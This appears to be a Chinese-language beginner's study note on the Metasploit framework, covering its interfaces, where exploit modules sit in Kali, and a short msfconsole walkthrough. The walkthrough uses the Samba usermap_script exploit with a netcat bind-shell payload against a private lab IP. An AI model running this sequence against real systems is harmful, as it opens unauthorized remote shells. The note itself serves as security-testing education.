Metasploit学习 一平台简介

         Metasploit 学习笔记    

大名鼎鼎的Metasploit ,我甚至不完全明白它的含义，实际上我只认识sploit,我觉得它最大的贡献莫过于规范了安全测试，或者说攻击。不过作为一个修电脑的，我肯定是用来做安全测试的。
 接口：
  Metasploit 有4个接口，msfconsole(控制台终端)，msfcli (命令行),msfgui(UI),armitage,和msfapi(远程调用接口)
  另外这个平台有封装攻击载荷的能力，还有一些辅助模块，方便前期信息收集的，还可以调用一些其他信息收集工具的功能。  
  在凯利中，这些攻击载荷存在于/usr/share/metasploit-framework/modules/exploits/中其中有14个系统分类，很多系统我听都没听过⊙�n⊙b，可以多去看一下这里面的攻击载荷的写法，很多时候，当有新的漏洞出现的时候，我们需要临时写攻击载荷来进行安全验证，或者基于特定的系统重新来写里面的代码，就算是以上行为都不需要，平时多看看也可以了解ruby的语法，然后大声的告诉别人，ruby不仅仅会写网页(吐槽了)

  下面是最常用的渗透测试步骤：

查找适用的渗透攻击模块，目前在kaili中ruby运行有点慢，在BT中比较块，也许ruby版本有关吧

> search samba  查找samba这个program的漏洞攻击模块

> use multi/samba/usermap_script     使用multi/samba/usermap_script 攻击载荷，这里可以稍微感受下metasploit的结构了，模块>载荷>工具

>show palyload     查看与该渗透模块相关的攻击载荷

> set payload cmd/unix/bind_netcat 使用该攻击载荷，kaili的好处就是可以自动添加补全，BT要手敲

>show options 这里面是设置界面，和GUI很像，至于UI和命令行，个人觉得都差不多，对于刚接触的人来说，UI界面不一定更快上手。而且metasploit和hack工具不同，无法立即做完整的攻击工具使用，而是要先建立理论模型，然后建立攻击模型，然后才开始渗透的。

> set RHOST 192.168.117.128  设置目的IP

>exploit  渗透

结果可能让你失望，因为这个是针对samba，如果你目标linux没装，就没法感觉效果了，呵呵，这里只是简单介绍下攻击步骤，最近也在看ruby语言的语法啦，因为后期会设计到手动修改载荷或者编写